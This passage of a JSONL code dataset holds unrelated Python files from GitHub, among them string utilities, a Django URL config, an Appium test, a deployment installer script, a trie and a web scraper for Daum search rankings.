contains an @ symbol and a .com\n # return True if format passes tests, return False otherwise\n\n\ndef anonymize_credit_card_number(credit_card_number):\n credit_card = credit_card_number[:-4]\n ccn = ''\n for char in credit_card:\n try:\n if type(int(char)) == int:\n ccn = ccn + 'X'\n except:\n ccn = ccn + char\n return ccn + credit_card_number[-4:]\n # should replace all characters except the last 4 with 'X'\n # return the anonymized credit card number as a string\n # the credit card may have characters that are not numbers (i.e. spaces and dashes, which we would want to keep)\n # i.e. 1234-5678-90-1234 -> XXXX-XXXX-XX-1234\n","repo_name":"ptbailey/python-strings-indepth-lab","sub_path":"string_functions.py","file_name":"string_functions.py","file_ext":"py","file_size_in_byte":2562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"39"}
+{"seq_id":"20247404948","text":"from random import randrange\nA =[1,2,3,4,5]\n\ndef shuffle(A):\n #i from 0 - n-1 \n for i in range(len(A)-1):\n #j from i to n\n j =randrange(i,len(A))\n A[i],A[j]=A[j],A[i]\n#[4, 5, 1, 2, 3]\n","repo_name":"Boom-Ba/Math","sub_path":"Probability/shuffle.py","file_name":"shuffle.py","file_ext":"py","file_size_in_byte":195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"16983654292","text":"class Solution:\n def findWinners(self, matches: List[List[int]]) -> List[List[int]]:\n wins = defaultdict(int)\n losses = defaultdict(int)\n \n undefeated = []\n oneloss = []\n for m in matches:\n wins[m[0]] += 1\n losses[m[1]] += 1\n \n minplayer = min(min(wins.keys()), min(losses.keys()))\n maxplayer = max(max(wins.keys()), max(losses.keys()))\n \n for n in range(minplayer, maxplayer+1):\n if losses[n] == 0 and wins[n] > 0:\n undefeated.append(n)\n elif losses[n] == 1:\n oneloss.append(n)\n \n return [undefeated, oneloss]","repo_name":"dyhliang/Leetcode","sub_path":"2225-find-players-with-zero-or-one-losses/2225-find-players-with-zero-or-one-losses.py","file_name":"2225-find-players-with-zero-or-one-losses.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"}
+{"seq_id":"42831323523","text":"__author__ = \"Riccardo Cagnasso \"\n\nimport collections as coll\n\n\nclass PickOne(object):\n \"\"\"\n PickOne is a class that you use for asking the user to choose between\n some options\n\n Arguments:\n choiches --- the available options between the user can choose. It can\n be an array or a dictionary. In the first case the keys are int from 0\n to len-1.\n\n Keyword arguments:\n message (optional) --- the message to be displayed when asking for\n input. It's a template for \"format\" function and receives the\n \"{choices}\" and the {default} parameter.\n errormessage (optional) --- the message to be displayed when the user\n entered a incorrect answer\n default (optional) --- a default value to use if user provides no input\n \"\"\"\n def __init__(self, choices,\n message=\"Choose one from [{choices}]{default}{cancelmessage}: \",\n errormessage=\"Invalid input\", default=None, cancel=False, cancelkey='c',\n cancelmessage='(press {cancelkey} to cancel)'):\n self.message = message\n self.errormessage = errormessage\n\n self.cancel = cancel\n self.cancelkey = cancelkey\n self.cancelmessage = cancelmessage\n\n if type(choices) == list:\n self.choices = coll.OrderedDict(\n zip(map(str, range(0, len(choices))), choices))\n elif issubclass(choices.__class__, dict):\n self.choices = coll.OrderedDict([(str(k), v)\n for k, v in choices.items()])\n\n self.default = default\n\n def buildPrompt(self):\n choices = [\"{key}={choice}\".format(key=key, choice=choice)\n for key, choice in self.choices.items()]\n\n if self.default is not None:\n default = \" (default={default})\".format(default=self.default)\n else:\n default = \"\"\n\n if self.cancel:\n cancelmessage = self.cancelmessage.format(cancelkey=self.cancelkey)\n else:\n cancelmessage = ''\n\n return self.message.format(choices=\" \".join(choices), default=default,\n cancelmessage=cancelmessage)\n\n def ask(self):\n \"\"\"\n The ask method is used to get the input from users\n \"\"\"\n while True:\n i = input(self.buildPrompt())\n\n if self.cancel and i == self.cancelkey:\n return None\n\n if i == \"\" and self.default is not None:\n i = self.default\n\n if i in self.choices:\n return self.choices[i]\n else:\n for k, v in self.choices.items():\n if i == str(v):\n return self.choices[k]\n\n print(self.errormessage)\n\n\ndef ask(choices,\n message=\"Choose one from [{choices}]{default}{cancelmessage}: \",\n errormessage=\"Invalid input\", default=None,\n cancel=False, cancelkey='c',\n cancelmessage='press {cancelkey} to cancel'):\n \"\"\"\n ask is a shorcut instantiate PickOne and use .ask method\n \"\"\"\n\n return PickOne(choices, message, errormessage, default, cancel, cancelkey,\n cancelmessage).ask()\n","repo_name":"riccardocagnasso/pickone","sub_path":"pickone/pickone.py","file_name":"pickone.py","file_ext":"py","file_size_in_byte":3166,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"}
+{"seq_id":"11408728909","text":"\"\"\"Split and merge color channels\"\"\"\nimport cv2\nimage=cv2.imread(\"image2.png\")\nb,g,r=cv2.split(image)\n\ncv2.imshow(\"Red\",r)\ncv2.imshow(\"Green\",g)\ncv2.imshow(\"Blue\",b)\n\nmerged=cv2.merge((r,g,b))\ncv2.imshow(\"Merged\",merged)\n\nif cv2.waitKey(0)==27:\n\tcv2.destroyAllWindows()\n","repo_name":"glen-s-abraham/sem3record","sub_path":"DIP/splitColorChannel.py","file_name":"splitColorChannel.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"40083050049","text":"# coding=utf-8\nimport sys\nfrom os import path\nfrom simplejson import load\nfrom subprocess import call\nfrom cloud import login\nfrom cloud import add_server\nfrom requests import Session\nfrom utility import exit_with_msg\nfrom utility import print_info\nfrom utility import print_error\nfrom utility import parseArg\n\n\ndef assert_ext(ext_file):\n if (path.isfile(ext_file) == False):\n exit_with_msg('file ext.json does not exist.')\n\n\ndef create_and_exec_install_shell(ext_object):\n try:\n cmd = '#!/bin/bash\\nsudo apt-get update\\n'\n for package_name in ext_object['install_packages']:\n cmd += 'sudo apt-get install -y %s\\n' % package_name\n install_shell = open('./install.sh', 'w+')\n cmd += '\\n'\n install_shell.write(cmd)\n install_shell.close()\n ret = call('sudo chmod a+x install.sh', shell=True)\n if (ret != 0):\n exit_with_msg('chmod for install')\n ret = call('./install.sh', shell=True)\n if (ret != 0):\n exit_with_msg('exec install.sh')\n ret = call('sudo rm -f install.sh', shell=True)\n if (ret != 0):\n exit_with_msg('rm install.sh')\n except KeyboardInterrupt:\n print_info('Keyboard interrupt by user - when install shell')\n sys.exit(1)\n except IOError:\n print_error('IO Error - when install shell')\n sys.exit(1)\n\n\ndef dowload_compile_and_install_libiconv():\n try:\n cmd = \"axel https://ftp.gnu.org/pub/gnu/libiconv/libiconv-1.15.tar.gz\\n \\\n tar -xvf libiconv-1.15.tar.gz\\n \\\n cd libiconv-1.15\\n \\\n sudo ./configure --prefix=/usr/local\\n \\\n sudo make\\n \\\n sudo make install\\n \\\n cd -\\n \\\n sudo rm libiconv* -rf\\n \\\n sudo ldconfig\"\n ret = call(cmd, shell=True)\n if (ret != 0):\n exit_with_msg('install libiconv')\n except KeyboardInterrupt:\n print_info('Keyboard interrupt by user')\n sys.exit(1)\n\n\ndef ln_hiredis():\n cmd = 'sudo ln -s /usr/lib/x86_64-linux-gnu/libhiredis.so.0.10 /usr/lib/x86_64-linux-gnu/libhiredis.so.0.13'\n ret = call(cmd, shell=True)\n return ret\n\n\ndef link_hiredis(ext_dir):\n try:\n if (path.isfile('/usr/lib/x86_64-linux-gnu/libhiredis.so.0.13')):\n return\n if (path.isfile('/usr/lib/x86_64-linux-gnu/libhiredis.so.0.10')):\n ret = ln_hiredis()\n if (ret != 0):\n exit_with_msg('Link hiredis')\n else:\n cmd = 'sudo cp %slibhiredis.so.0.10 /usr/lib/x86_64-linux-gnu' % ext_dir\n ret = call(cmd, shell=True)\n if (ret != 0):\n exit_with_msg('cp libhiredis.so')\n else:\n ret = ln_hiredis()\n if (ret != 0):\n exit_with_msg('Link hiredis')\n except KeyboardInterrupt:\n print_info('Keyboard interrupt by user')\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n isCalc = False\n isCalc = parseArg(sys.argv[1:])\n ext_dir = '../ext/'\n assert_ext(ext_dir + 'ext.json')\n ext_object = load(open(ext_dir + 'ext.json', 'r'))\n create_and_exec_install_shell(ext_object)\n session = Session()\n ret = login(session, ext_object['cloud_login_url'], ext_object['cloud_username'],\n ext_object['cloud_password'], debug=ext_object['debug_mode'])\n if (ret):\n print_info('Login success')\n ret = add_server(\n session, ext_object['cloud_add_server_url'], ext_dir, debug=ext_object['debug_mode'])\n if (ret):\n print_info('Add server success')\n else:\n exit_with_msg('Add server fail')\n else:\n exit_with_msg('Login fail')\n if (isCalc == False):\n link_hiredis(ext_dir)\n dowload_compile_and_install_libiconv()\n","repo_name":"niconical/Script","sub_path":"auto_deploy/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"72094806119","text":"import discord\nfrom discord.ext import commands\n\nclass Avatar(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command()\n async def avatar(self, ctx, member: discord.Member = None):\n if member is None:\n member = ctx.author\n\n embed = discord.Embed(title=f\"Avatar - {member.name}\", color=discord.Color.blue())\n embed.set_image(url=member.avatar_url)\n\n await ctx.send(embed=embed)\n\ndef setup(bot):\n bot.add_cog(Avatar(bot))\n","repo_name":"xxsweatygirlyt/orko-bot","sub_path":"avatar.py","file_name":"avatar.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"74513080359","text":"'''\nConverts a string to a binary file.\nUsage: python b.py \nExample: python b.py \"Hello World\" hello.bin\n'''\n\nimport sys\n\nif len(sys.argv) != 3:\n print(\"Usage: python b.py \")\n sys.exit(1)\n\ninput_string = sys.argv[1]\nfile_name = sys.argv[2]\n\nwith open(file_name, \"wb\") as binary_file:\n binary_file.write(input_string.encode())","repo_name":"dimitrivlachos/Inky-pHAT-Zero","sub_path":"b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"5441628247","text":"# -*- coding: utf-8 -*-\n# @Time : 18-9-12 下午1:47\n# @Author : Gold_py\n# @Site : \n# @File : urls.py\n# @Software: PyCharm\nfrom django.conf.urls import url\nfrom .views import IndexViews,User\n\n\nurlpatterns = [\n # 跳转到商城的首页面\n url(r'^$', IndexViews.homeindex,name='home_index' ),\n # 商城的列表页面\n url(r'^list/(?P[0-9]+)/$',User.UserList,name='user_list'),\n # 商城商品的详情页面\n url(r'^info/(?P[0-9]+)/$',User.UserInfo,name='user_info'),\n # 商城的注册界面\n url(r'^register/$',User.UserRegiser,name='user_regiser'),\n # 商城的登录界面\n url(r'^login/$',User.UserLogin,name='user_login'),\n # 验证码的生成位置\n url(r'^passcode/$',User.verifycode,name='user_pass_code'),\n # 获取手机验证码\n url(r'^phonecode/$',User.phonecode,name='user_phone_code'),\n # 退出都登录\n url(r'^logout/$',User.UserLogOut,name='user_log_out'),\n # 购物车\n url(r'^bycar/$',User.UserCar,name='user_car'),\n # 加入购物车\n url(r'^bycar/addgood/$',User.AddGood,name='add_good'),\n # 跟改购物车\n url(r'^bycar/edit_good/$',User.GoodEdit,name='good_edit'),\n # 删除购物车中的某个商品\n url(r'^bycar/del_good/$',User.GoodDel,name='good_del'),\n # 清除购物车\n url(r'^bycar/flush/$',User.GoodFlushi,name='good_flush'),\n\n\n\n # 以下的操作需要获取登录认证\n\n\n\n # 商城跳转到确认订单的页面\n url(r'^order/confirm/$',User.OrderMake,name='order_make'),\n # 生成订单\n url(r'^order/create/$',User.OrderCreate,name='order_create'),\n # 跳转到付款的界面\n url(r'^order/payfor/$',User.OrderPayFor,name='order_pay_for'),\n # 订单状态改变为1,已付款\n url(r'^order/payfored/$',User.OrderPayFored,name='order_pay_fored'),\n # 跳转到付款成功界面\n url(r'^order/payforsuccess/$',User.OrderPayForSuccess,name='order_pay_for_suscess'),\n # 跳转到我的订单界面\n url(r'^my/order/orderlist/$',User.MyOrderList,name='my_order_list'),\n\n\n # 添加地址\n url(r'^user/addaddress/$',User.AddAdderss,name='add_address'),\n # 地址管理器\n url(r'address/manage/$',User.AdderssManage,name='address_manage'),\n # 删除地址\n url(r'address/manage/delete/$',User.AdderssManageDelete,name='address_manage_delete'),\n # 跟改地址\n url(r'address/manage/update/$',User.AdderssManageUpdate,name='address_manage_update'),\n\n\n # 个人中心\n url('^user/mycenter/$',User.MyCenter,name='my_center'),\n # 更改个人信息\n url('^user/mycenter/$',User.MyCenter,name='my_center'),\n\n\n # 初始化密码\n url('^init/$',User.Init,name='init'),\n\n\n\n\n # 缓存测试\n url('^cache1/$',User.cache1,name='cache1'),\n url('^cache2/$',User.cache2,name='cache2'),\n\n\n\n\n\n]","repo_name":"GITliyanfeng/phone-shop-django","sub_path":"myhome/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"20637984313","text":"# -*- coding:utf-8 -*-\nimport sys,re,subprocess\nsys.path.append('..')\n\nfrom time import sleep\nimport unittest\nimport lib.public_functions as pubfuc\nimport multiprocessing\nfrom appium import webdriver\nfrom appium.webdriver.common.touch_action import TouchAction\n\n\ndef 加入离开房间(driver,roomid):\n print(driver.desired_capabilities)\n devicedriverinfo = driver.desired_capabilities\n sleep(5)\n num = 1\n print(driver.page_source)\n while num < 301:\n if num == 1:\n driver.find_element_by_xpath('//android.widget.EditText[@text=\"会议室名称\"]').send_keys(roomid)\n sleep(2)\n print(f\"第{num}次{driver}加入离开房间\")\n # io.agora.vcall:id/encryption_key\n # pubfuc.waittimeout(driver.find_element_by_id(控件信息['JOIN']['id']))\n if not driver.find_element_by_xpath('//android.widget.Button[@text=\"加入\"]').get_attribute('enabled'):\n sleep(3)\n driver.find_element_by_xpath('//android.widget.Button[@text=\"加入\"]').click()\n sleep(10)\n if driver.find_element_by_xpath(\"//android.widget.ImageView[@content-desc='END_CALL']\") is None:\n driver.tap([100,100])\n sleep(2)\n driver.find_element_by_xpath(\"//android.widget.ImageView[@content-desc='END_CALL']\").click()\n sleep(2)\n num += 1\n\n\nclass AgoraTest(unittest.TestCase):\n\n def setUp(self):\n # self.控件信息 = pubfuc.getymlfileinfo()['zego_Android']\n #第一个为主播\n devicelist = ['RedMI']\n\n\n self.sd = pubfuc.StartDriver(devicelist)\n\n self.proc_list = []\n 是否mac = 'mac' in pubfuc.getcurretsystem()\n\n pubfuc.cleannodeproc()\n for i in range(len(self.sd.devicelist)):\n self.proc_list.append(multiprocessing.Process(target=self.sd.startappiumserver, args=(i,)))\n\n # print(self.proc_list)\n\n for pro in self.proc_list:\n pro.start()\n\n for pro in self.proc_list:\n pro.join()\n\n while len(self.sd.getnodeprocpid()) < len(devicelist):\n sleep(1)\n\n\n print(self.sd.getnodeprocpid())\n\n self.driverlist = []\n for i in range(len(self.sd.devicelist)):\n desire_caps = self.sd.realdevice[i]\n desire_caps['appPackage'] = 'io.agora.vcall'\n desire_caps['appActivity'] = 'io.agora.vcall.ui.SplashActivity'\n driver = webdriver.Remote(f\"http://localhost:{self.sd.aport[i]}/wd/hub\", desire_caps)\n self.driverlist.append(driver)\n driver.page_source\n print(self.driverlist)\n\n def test_001参与者多次加入离开房间(self):\n procs = []\n pool = multiprocessing.Pool(processes=len(self.driverlist))\n for driver in self.driverlist:\n proc = pool.apply_async(加入离开房间,(driver,'qq',))\n procs.append(proc)\n for i in procs:\n i.get()\n for i in procs:\n i.wait()\n\n def tearDown(self):\n # quite the device driver\n for driver in self.driverlist:\n driver.quit()\n for proc in self.proc_list:\n print(proc.is_alive())\n proc.terminate()\n # proc.kill()\n #clean the node process,appium server is started by node\n pubfuc.cleannodeproc()\n\n\n\n\n\n","repo_name":"zhhy/auto","sub_path":"testcase/agora_testcase.py","file_name":"agora_testcase.py","file_ext":"py","file_size_in_byte":3317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"12653924532","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nsys.path.append(os.path.abspath(os.path.dirname(__file__)+'/../../'))\nsys.path.append(os.path.abspath('/grad/1/iida/mytools/python2.7/lib/python2.7/site-packages/'))\n\nimport argparse\nimport math\nimport cv2\nimport numpy as np\nimport csv\nimport glob\nimport yaml\nimport pickle\nfrom multiprocessing import Pool\n\nIN_RECONSTRUCTION_FILENAME = \"tangoCameraPose_floor.json\"\nTRAJECTORY_FILENAME = \"2dtrajectory.csv\"\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='create score map')\n parser.add_argument('test_num_dir', help='path to data dir to be processed')\n parser.add_argument('-p', '--parameter', nargs='?', type=str, default='parameter.yaml', help='load parameter yaml file(default=parameter.yaml)')\n parser.add_argument('-d', '--data', nargs='?', type=str, default='data.yaml', help='load data yaml file(default=data.yaml)')\n parser.add_argument('-f', '--target_floors', nargs='*', type=str, help='target floor names')\n parser.add_argument('-t', '--targets', nargs='*', type=str, help='target data names')\n parser.add_argument('-c', '--config', nargs='?', type=str, help='load config yaml file')\n parser.add_argument('-a', '--plot_all', default=False, action='store_true', help='create for all floor(default=False)')\n parser.add_argument('-o', '--target_data_config', nargs='?', type=str, default=None, help='target data config(default: same as data)')\n parser.add_argument('-j', '--process_num', nargs='?', type=int, default='4', help='process number(default=4)')\n args = parser.parse_args()\n\n # set args\n test_num_dir = args.test_num_dir\n target_floors = args.target_floors\n targets = args.targets\n plot_all = args.plot_all\n process_num = args.process_num\n parameter_fn = os.path.join(test_num_dir, args.parameter)\n data_dir = os.path.join(test_num_dir, os.path.splitext(args.data)[0])\n data_config_fn = os.path.join(test_num_dir, args.data)\n target_data_config_fn = data_config_fn if args.target_data_config is None else os.path.join(test_num_dir, args.target_data_config)\n results_dir = os.path.join(data_dir, 'score')\n\n # logger setting\n log_fn = os.path.join(os.path.join(data_dir), 'log.txt')\n import logging\n logger = logging.getLogger('testLogger')\n logger.setLevel(logging.INFO)\n formatter = logging.Formatter('(PID:%(process)d)[%(asctime)s][%(levelname)s] %(message)s')\n fh = logging.FileHandler(log_fn)\n logger.addHandler(fh)\n fh.setFormatter(formatter)\n sh = logging.StreamHandler()\n logger.addHandler(sh)\n sh.setFormatter(formatter)\n logger.info('Start Logging: {}'.format(log_fn))\n # logger setting done\n\n # set parameters\n logger.info('load meta yaml file: {}'.format(parameter_fn))\n with open(parameter_fn, 'r') as f:\n parameter = yaml.load(f)\n crop_size = parameter['setting']['crop_size']\n crop_step = parameter['setting']['crop_step']\n\n pix_per_meter = parameter['setting']['pix_per_meter']\n crop_size = parameter['setting']['crop_size']\n crop_step = parameter['setting']['crop_step']\n align_step = parameter['setting']['align_step']\n align_voxel_size = parameter['setting']['align_voxel_size']\n decimate = parameter['setting']['align_decimate']\n\n fire_threshold = parameter['setting']['fire_threshold']\n good_consistency_threshold = parameter['setting']['good_consistency_threshold']\n\n hit_shot_count_threshold = parameter['setting']['hit_shot_count_threshold']\n floor_voxel_count_threshold = parameter['setting']['floor_voxel_count_threshold']\n\n max_save_num = parameter['setting']['max_save_num']\n max_save_znum = parameter['setting']['max_save_znum']\n\n # load datasets\n logger.info('load target data yaml file: {}'.format(target_data_config_fn))\n with open(target_data_config_fn, 'r') as f:\n data_config = yaml.load(f)\n floorplans_dir = data_config['path']['floorplans']\n datasets_dir = data_config['path']['datasets']\n\n # load target pairs\n target_pairs = {}\n if target_floors is None:\n target_floors = []\n for floor in data_config['floors']:\n if data_config['floors'][floor]['val']:\n target_floors.append(floor)\n if targets is None:\n targets = []\n for dn in data_config['datasets']:\n # if 'target_floor_all' in config['datasets'][dn] and config['datasets'][dn]['target_floor_all']:\n # target_pairs[dn] = target_floors\n # elif 'target_floor' in config['datasets'][dn]:\n # floors = []\n # if config['datasets'][dn]['target_floor'] is None:\n # continue\n # for floor in config['datasets'][dn]['target_floor']:\n # floors.append(floor)\n # target_pairs[dn] = floors\n if data_config['datasets'][dn] is not None and 'target' in data_config['datasets'][dn] and data_config['datasets'][dn]['target']:\n target_pairs[dn] = target_floors\n else:\n for target in targets:\n target_pairs[target] = target_floors\n\n # print target pairs\n for dn in target_pairs:\n logger.info('target pairs: {}'.format(dn))\n for floor in target_pairs[dn]:\n logger.info(' {}'.format(floor))\n\n for data_name in target_pairs:\n target_dir = os.path.join(results_dir, data_name)\n\n tra_fn = os.path.join(datasets_dir, '{}/2dtrajectory.csv'.format(data_name))\n tra_dict = {}\n with open(tra_fn, 'r') as f:\n reader = csv.reader(f)\n for row in reader:\n k = row[0]\n x = int(row[1])\n y = int(row[2])\n z = float(row[4]) * pix_per_meter # z will come in meter\n tra_dict[k] = [x, y, z]\n logger.info('load {} trajectory points from {}'.format(len(tra_dict), tra_fn))\n\n meta_fn = os.path.join(datasets_dir, '{}/meta.yaml'.format(data_name))\n with open(meta_fn, 'r') as f:\n meta = yaml.load(f)\n logger.info('load meta data {}'.format(meta_fn))\n\n for floor_fn in meta['floorplans']:\n target_floor_dir = os.path.join(target_dir, os.path.splitext(floor_fn)[0])\n if not os.path.exists(target_floor_dir):\n logger.info('target floor not found: {}'.format(target_floor_dir))\n continue\n logger.info('target floor: {}'.format(floor_fn))\n\n fp_fn = os.path.join(floorplans_dir, floor_fn)\n fp_img = cv2.imread(fp_fn)\n\n # load score\n score_fn_list = glob.glob(os.path.join(target_floor_dir, 'score/*.csv'))\n score_fn_list.sort()\n score_fn_list = score_fn_list[::decimate]\n logger.info('load {} scores'.format(len(score_fn_list)))\n target_tra_dict = {}\n range_x, range_y, range_z = None, None, None\n score_yxz_dict = {}\n floormask_yxz_dict = {}\n score_map_count = None\n\n ## load score map from csv\n score_map_dict = {}\n for score_fn in score_fn_list:\n shot_name = os.path.splitext(os.path.basename(score_fn))[0]+'.png'\n score_map = np.zeros((fp_img.shape[0], fp_img.shape[1], 1), dtype=float)\n # score_map = np.zeros((fp_img.shape[0]//align_voxel_size[1], fp_img.shape[1]//align_voxel_size[0], 1), dtype=float)\n score_map += -1 # for out-range of floormask\n with open(score_fn, 'r') as f:\n reader = csv.reader(f)\n for row in reader:\n x = int(row[0])\n y = int(row[1])\n score = float(row[2])\n score_map[int(y-crop_step/2):int(y+crop_step/2), int(x-crop_step/2):int(x+crop_step/2)] = score\n # score_map[(y-crop_step/2)//align_voxel_size[1]:(y+crop_step/2)//align_voxel_size[1], (x-crop_step/2)//align_voxel_size[0]:(x+crop_step/2)//align_voxel_size[0]] = score # center to topleft\n score_map_dict[shot_name] = score_map\n logger.info('load score map from csv')\n\n # create score map of each translation(len(range_y)*len(range_x))\n logger.info('start to create score map of each translation')\n # results = [[] for z in range(len(range_z))]\n\n # calc_score\n def calc_score(arg):\n tra_y = arg[0]\n tra_x = arg[1]\n tra_z = arg[2]\n\n # count number of shots which hit floor\n hit_shot_list = []\n count_yx = np.zeros((fp_img.shape[0], fp_img.shape[1]), dtype=int)\n # floor_voxel_count = 0\n floor_voxel_count = 0\n for score_fn in score_fn_list:\n shot_name = os.path.splitext(os.path.basename(score_fn))[0]+'.png'\n if shot_name not in tra_dict:\n\n continue\n xyz = tra_dict[shot_name]\n # y = (xyz[1] + tra_y) // align_voxel_size[1]\n # x = (xyz[0] + tra_x) // align_voxel_size[0]\n y = ((xyz[1] + tra_y)//crop_step) * crop_step\n x = ((xyz[0] + tra_x)//crop_step) * crop_step\n z = xyz[2] + tra_z\n if not (-align_step[2]/2 < z < align_step[2]/2):\n continue\n if y < 0 or y >= score_map_dict[shot_name].shape[0] or \\\n x < 0 or x >= score_map_dict[shot_name].shape[1] or \\\n score_map_dict[shot_name][y][x] < 0: # out of range\n continue\n\n if count_yx[y, x] == 0:\n floor_voxel_count += 1\n count_yx[y:y+crop_step, x:x+crop_step] += 1\n hit_shot_list.append(shot_name)\n\n # sum scores for each voxel\n score = 0.0\n fire = []\n c = 0\n for shot_name in hit_shot_list:\n xyz = tra_dict[shot_name]\n # y = (xyz[1] + tra_y) // align_voxel_size[1]\n # x = (xyz[0] + tra_x) // align_voxel_size[0]\n y = int(xyz[1] + tra_y)\n x = int(xyz[0] + tra_x)\n s = score_map_dict[shot_name][y][x]\n if s > fire_threshold:\n fire.append(shot_name)\n score += s/float(count_yx[y][x])\n\n # average\n score /= float(floor_voxel_count)\n\n result = {}\n result['x'] = int(tra_x)\n result['y'] = int(tra_y)\n result['z'] = int(tra_z)\n result['score'] = float(score)\n result['in_floor'] = hit_shot_list\n result['fire'] = fire\n\n return result\n\n # get tra_x, tra_y, tra_z\n tra_floor_fn = os.path.join(datasets_dir, '{}/2dtrajectory_{}.csv'.format(data_name, os.path.splitext(floor_fn)[0]))\n tra_floor_dict = {}\n c = 0\n tra_x = 0\n tra_y = 0\n tra_z = 0\n with open(tra_floor_fn, 'r') as f:\n reader = csv.reader(f)\n for row in reader:\n k = row[0]\n tra_x += int(row[1]) - tra_dict[k][0]\n tra_y += int(row[2]) - tra_dict[k][1]\n tra_z += float(row[4]) * pix_per_meter - tra_dict[k][2]\n c += 1\n tra_x /= c\n tra_y /= c\n tra_z /= c\n logger.info('translation: ({}, {}, {})'.format(tra_x, tra_y, tra_z))\n result = calc_score([tra_y, tra_x, tra_z])\n\n # save results\n logger.info('creating result dict to save')\n out_info_fn = os.path.join(target_floor_dir, 'actual_score.yaml')\n data = {}\n data['actual'] = result\n with open(out_info_fn, 'w') as f:\n f.write(yaml.dump(data, default_flow_style=False))\n\n # plot data\n # load base image\n fp_img = cv2.imread(fp_fn)\n\n trax = int(result['x'])\n tray = int(result['y'])\n\n # plot trajectory\n for shot in score_fn_list: # here will cause error if DECIMATE is different with align info\n shot = os.path.splitext(os.path.basename(shot))[0] + '.png'\n if shot not in tra_dict:\n continue\n x, y = tra_dict[shot][0] + trax, tra_dict[shot][1] + tray\n\n if y in range(fp_img.shape[0]) and x in range(fp_img.shape[1]):\n if shot in result['fire']:\n cv2.circle(fp_img, (x, y), 5, (0, 0, 255), -1)\n elif shot in result['in_floor']:\n cv2.circle(fp_img, (x, y), 5, (255, 0, 0), -1)\n else:\n cv2.circle(fp_img, (x, y), 5, (0, 0, 0), -1)\n\n # save image file\n out_img_fn = os.path.join(target_floor_dir, 'actual_{}.png'.format(result['z']))\n cv2.imwrite(out_img_fn, fp_img)\n logger.info(\"save {}\".format(out_img_fn))\n break\n\n","repo_name":"iidango/tangologger","sub_path":"manual_alignment/test/alignment/past_scripts/calc_actual_score.py","file_name":"calc_actual_score.py","file_ext":"py","file_size_in_byte":13435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"21375216403","text":"#\n# @lc app=leetcode.cn id=208 lang=python3\n#\n# [208] 实现 Trie (前缀树)\n#\n\n# @lc code=start\nclass Trie:\n\n def __init__(self, val=None, end=True):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.children = {}\n self.end = end\n self.val = val\n\n def insert(self, word: str) -> None:\n \"\"\"\n Inserts a word into the trie.\n \"\"\"\n if not word:\n return\n if word[0] not in self.children:\n self.children[word[0]] = Trie(word[0], len(word) == 1)\n c = self.children[word[0]]\n if len(word) == 1:\n c.end = True\n c.insert(word[1:])\n\n def search(self, word: str) -> bool:\n \"\"\"\n Returns if the word is in the trie.\n \"\"\"\n if not word:\n return True\n if word[0] not in self.children:\n return False\n else:\n c = self.children[word[0]]\n if len(word) == 1:\n return c.end\n else:\n return c.search(word[1:])\n\n def startsWith(self, prefix: str) -> bool:\n \"\"\"\n Returns if there is any word in the trie that starts with the given prefix.\n \"\"\"\n if not prefix:\n return True\n if prefix[0] not in self.children:\n return False\n else:\n c = self.children[prefix[0]]\n return c.startsWith(prefix[1:])\n\n\n# Your Trie object will be instantiated and called as such:\n# obj = Trie()\n# obj.insert(word)\n# param_2 = obj.search(word)\n# param_3 = obj.startsWith(prefix)\n# @lc code=end\n","repo_name":"cuyu/leetcode","sub_path":"208.实现-trie-前缀树.py","file_name":"208.实现-trie-前缀树.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"37589624495","text":"import requests\nimport csv\nfrom pprint import pprint\nfrom bs4 import BeautifulSoup\n\ndaum_url = 'https://www.daum.net/'\nresponse = requests.get(daum_url).text\n\ndata = BeautifulSoup(response, 'html.parser')\nrankings = data.select('#mArticle > div.cmain_tmp > div.section_media > div.hotissue_builtin.hide > div.realtime_part > ol > li > div > div:nth-child(1) > span.txt_issue > a') # 여러개(리스트)\n# data.select_one() # 한 개\n\n\n# for idx, rank in enumerate(rankings, 1):\n# print(f'{idx}위 : {rank.text}')\n\n# 데��터를 딕셔너리로 만들기\n# result_dict = {}\n# for idx, rank in enumerate(rankings, 1):\n# result_dict[f'{idx}위'] = rank.text\n# print(result_dict)\n\n# 위에서 만든 데이터로 csv에 저장\n# with open('daum_rank.csv', 'w', newline='', encoding='utf-8') as csvfile:\n# csv_writer = csv.writer(csvfile)\n# for item, rank in result_dict.items():\n# csv_writer.writerow([item, rank])\n\n# 먼저 데이터를 json 데이터처럼 다시 만들기\nresult_list = []\nfor idx, rank in enumerate(rankings, 1):\n result_dict = {'rank': f'{idx}위', 'ranker': rank.text}\n result_list.append(result_dict)\n# pprint(result_list)\n\n# 새로 만든 데이터를 바탕으로 DictWriter 를 사용하기\nwith open('daum_rank.csv', 'w', newline='', encoding='utf-8') as csvfile:\n # 저장할 데이터들의 필드 이름을 미리 지정(딕셔터리의 key 이름과 일치해야 